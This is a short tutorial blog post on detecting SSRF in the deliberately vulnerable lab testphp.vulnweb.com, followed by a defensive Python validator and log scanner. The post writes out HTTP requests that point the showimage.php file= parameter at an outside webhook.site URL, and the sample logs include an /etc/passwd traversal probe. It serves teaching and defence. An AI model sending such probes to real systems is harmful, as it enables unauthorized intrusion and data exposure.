Identify SSRF (Server-Side Request Forgery) in http://testphp.vulnweb.com/

UJJWAL GAUTAM
2 min read · Jul 7, 2021


What is SSRF?

Server-side request forgery (also known as SSRF) is a web security vulnerability that allows an attacker to induce the server-side application to make HTTP requests to an arbitrary domain of the attacker’s choosing.

In a typical SSRF attack, the attacker might cause the server to make a connection to internal-only services within the organization’s infrastructure. In other cases, they may be able to force the server to connect to arbitrary external systems, potentially leaking sensitive data such as authorization credentials. (source: https://portswigger.net/web-security/ssrf)

So let's identify SSRF in the http://testphp.vulnweb.com/ lab.

1. Let's capture the request for the home page of http://testphp.vulnweb.com/ in Burp and spider it.

GET / HTTP/1.1
Host: testphp.vulnweb.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://www.google.com/
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

2. Send the request to the spider to identify as many endpoints as possible. We choose an endpoint with the parameter “file=”:

GET /showimage.php?file=./pictures/5.jpg HTTP/1.1
Host: testphp.vulnweb.com
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://testphp.vulnweb.com/listproducts.php?cat=1

3. Replace the value of the file parameter with an attacker-controlled domain (you can use Burp Collaborator, or simply get a unique URL from https://webhook.site/, https://requestcatcher.com/ or https://requestbin.com/).

Request

GET /showimage.php?file=https://webhook.site/1bdcb7a2-06c7-4c10-919a-654a5a2cac0a HTTP/1.1
Host: testphp.vulnweb.com
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://testphp.vulnweb.com/listproducts.php?cat=1

Response

HTTP/1.1 200 OK
Server: nginx/1.19.0
Date: Wed, 07 Jul 2021 08:55:45 GMT
Content-Type: image/jpeg
Connection: close
X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1
Content-Length: 0

4. Let's see if the target interacted with the attacker-controlled domain.

Yes, there is an interaction with the attacker-controlled unique URL, and the source IP address belongs to the target. In this way we identify that http://testphp.vulnweb.com/ is vulnerable to SSRF.
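Note that the response above is a 200 with Content-Length: 0, so the response body alone would not reveal the outbound fetch; the out-of-band hit is the evidence. From the defender's side, the fix is to stop treating file= as a URL at all, and the same rule can be used to flag probes in the access log. The following is an added example, not code from the post or from the vulnweb lab: an allowlist check that accepts only pictures/<name> with an image extension, and a scanner that applies it to constructed Common Log Format lines (the webhook.site token is a placeholder).

```python
import posixpath
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed example (not the lab's code): an allowlist check for a
# showimage.php-style file= parameter, plus a scanner for SSRF probes in access logs.
ALLOWED_DIR = "pictures"
ALLOWED_EXT = {".jpg", ".jpeg", ".png", ".gif"}

def classify_file_param(value: str) -> str:
    """Return 'ok', 'url' (SSRF probe), 'traversal' or 'invalid' for a raw file= value."""
    v = unquote(value).strip()  # one extra decode on purpose: strict, never lenient
    if not v:
        return "invalid"
    parts = urlsplit(v)
    # Any scheme (http, https, file, gopher, dict, ...) or a //host prefix is a URL, not a path.
    if parts.scheme or parts.netloc or v.startswith(("//", "\\\\")):
        return "url"
    if v.startswith("/") or "\\" in v:
        return "invalid"  # absolute or Windows-style paths are never expected
    norm = posixpath.normpath(v)
    if norm == ".." or norm.startswith("../"):
        return "traversal"
    head, _, tail = norm.partition("/")
    if head != ALLOWED_DIR or not tail or "/" in tail:
        return "invalid"  # exactly pictures/<name>, nothing deeper
    if posixpath.splitext(tail)[1].lower() not in ALLOWED_EXT:
        return "invalid"
    return "ok"

def find_ssrf_probes(log_lines):
    """Return (client_ip, file_value) for Common Log Format lines whose file= is a URL."""
    hits = []
    for line in log_lines:
        try:
            request_target = line.split('"')[1].split(" ")[1]
        except IndexError:
            continue  # no quoted request line
        client_ip = line.split(" ", 1)[0]
        for value in parse_qs(urlsplit(request_target).query).get("file", []):
            if classify_file_param(value) == "url":
                hits.append((client_ip, value))
    return hits

# Constructed log lines (not real lab traffic); the second mirrors the probe in the post.
SAMPLE_LOG = [
    '203.0.113.5 - - [07/Jul/2021:08:55:44 +0000] "GET /showimage.php?file=./pictures/5.jpg HTTP/1.1" 200 4123',
    '203.0.113.5 - - [07/Jul/2021:08:55:45 +0000] "GET /showimage.php?file=https://webhook.site/EXAMPLE-TOKEN HTTP/1.1" 200 0',
    '198.51.100.9 - - [07/Jul/2021:08:56:01 +0000] "GET /showimage.php?file=..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 0',
]
```

Running find_ssrf_probes(SAMPLE_LOG) reports only the second line; the traversal attempt on the third line is rejected by the same check but is a different finding and is not counted as SSRF.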

Enjoy!
